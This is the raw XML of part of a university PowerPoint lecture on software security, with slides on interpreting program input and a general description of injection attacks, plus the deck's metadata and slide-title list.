          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104775" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="825"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Program input may be binary or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>binary interpretation depends on encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-165" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usually application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>specific</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text </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>encoded </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in a character set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" i="1" spc="-145" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>UTF-8</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>internationalization has increased</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variety</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also need to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>validate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>interpretation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>email address,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>identifier</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="221615" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="705"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Failure to validate may result in an exploitable  vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="30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8</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>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 y="457200"/>
            <a:ext cx="9144000" cy="1524000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="1524000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1524000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1523999"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000"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522217" y="1006855"/>
            <a:ext cx="3014345" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-140" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2077465"/>
            <a:ext cx="7424420" cy="3879215"/>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3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>relating to invalid input handling </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>which  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>then influences program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="307340" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>often when passed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>as a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>helper  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program or other utility or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>subsystem</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Most </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>often occurs in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>languages</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="382270" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Propagate through reuse of other programs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-165" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>modules</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>often </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>seen </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CGI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463295" y="463295"/>
            <a:ext cx="9131300" cy="6845300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9131300" h="6845300">
                <a:moveTo>
                  <a:pt x="9131046" y="6845046"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9131046" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6845046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9131046" y="6845046"/>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827516" y="6888788"/>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9</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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FF0041-0C32-427B-BEAF-AF217EC1D13E}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{362503BE-4705-4B23-A815-91953369FE70}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template/>
  <TotalTime>23</TotalTime>
  <Words>2658</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>402</Paragraphs>
  <Slides>44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Arial Narrow</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>IT 4823 Information Security Administration</vt:lpstr>
      <vt:lpstr>Software Security</vt:lpstr>
      <vt:lpstr>Software Quality vs Security</vt:lpstr>
      <vt:lpstr>Defensive Programming</vt:lpstr>
      <vt:lpstr>Security by Design</vt:lpstr>
      <vt:lpstr>Handling Program Input</vt:lpstr>
      <vt:lpstr>Input Size and Buffer Overflow</vt:lpstr>
      <vt:lpstr>Interpretation of Input</vt:lpstr>
      <vt:lpstr>Injection Attacks</vt:lpstr>
      <vt:lpstr>Unsafe Perl Script</vt:lpstr>
      <vt:lpstr>Safer Script</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>Code Injection</vt:lpstr>
      <vt:lpstr>SQLi Example</vt:lpstr>
      <vt:lpstr>SQLi Example</vt:lpstr>
      <vt:lpstr>SQLi</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) Attacks</vt:lpstr>
      <vt:lpstr>XSS Example</vt:lpstr>
      <vt:lpstr>Validating Input Syntax</vt:lpstr>
      <vt:lpstr>Alternate Encodings</vt:lpstr>
      <vt:lpstr>Validating Numeric Input</vt:lpstr>
      <vt:lpstr>Input Fuzzing</vt:lpstr>
      <vt:lpstr>Writing Safe Program Code</vt:lpstr>
      <vt:lpstr>Correct Algorithm Implementation</vt:lpstr>
      <vt:lpstr>Correct Machine Language</vt:lpstr>
      <vt:lpstr>Correct Data Interpretation</vt:lpstr>
      <vt:lpstr>Correct Use of Memory</vt:lpstr>
      <vt:lpstr>Race Conditions in Shared Memory</vt:lpstr>
      <vt:lpstr>Interacting with O/S</vt:lpstr>
      <vt:lpstr>Environment Variables</vt:lpstr>
      <vt:lpstr>Example Vulnerable Scripts</vt:lpstr>
      <vt:lpstr>Vulnerable Compiled Programs</vt:lpstr>
      <vt:lpstr>Use of Least Privilege</vt:lpstr>
      <vt:lpstr>Root/Admin Programs</vt:lpstr>
      <vt:lpstr>System Calls and  Standard Library Functions</vt:lpstr>
      <vt:lpstr>Secure File Shredder</vt:lpstr>
      <vt:lpstr>Race Conditions</vt:lpstr>
      <vt:lpstr>Safe Temporary Files</vt:lpstr>
      <vt:lpstr>Other Program Interaction</vt:lpstr>
      <vt:lpstr>Handling Program Output</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- 4823_15_software_security.pptx</dc:title>
  <dc:creator>bbrown</dc:creator>
  <cp:lastModifiedBy>Hossain Shahriar</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-19T19:08:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-10T19:50:16Z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2016-09-02T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>PScript5.dll Version 5.2.2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2019-06-19T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>